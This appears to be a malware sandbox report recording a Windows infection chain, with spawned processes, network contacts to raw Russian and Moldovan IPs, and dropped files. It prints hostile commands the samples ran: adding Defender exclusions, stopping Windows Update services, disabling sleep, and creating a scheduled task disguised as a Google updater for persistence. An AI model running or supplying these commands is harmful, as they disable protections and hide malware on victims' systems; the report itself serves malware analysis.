C:\Users\Admin\AppData\Local\Temp\A04F.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp" /SL5="$6011E,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -i

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Query

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\xrecode3\xrecode3.exe

"C:\Program Files (x86)\xrecode3\xrecode3.exe" -s

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 1

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
RU 81.19.131.34:80 81.19.131.34 tcp
US 8.8.8.8:53 34.131.19.81.in-addr.arpa udp
RU 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
RU 81.19.131.34:80 81.19.131.34 tcp
MD 176.123.7.190:32927 - tcp
US 8.8.8.8:53 190.7.123.176.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\9630.exe

C:\Users\Admin\AppData\Local\Temp\9438.exe

C:\Users\Admin\AppData\Local\Temp\A04F.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp

C:\Users\Admin\AppData\Local\Temp\is-GMI39.tmp\_isetup\_iscrypt.dll

C:\Users\Admin\AppData\Local\Temp\is-GMI39.tmp\_isetup\_isdecmp.dll

C:\Program Files (x86)\xrecode3\xrecode3.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hda52irk.xjc.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
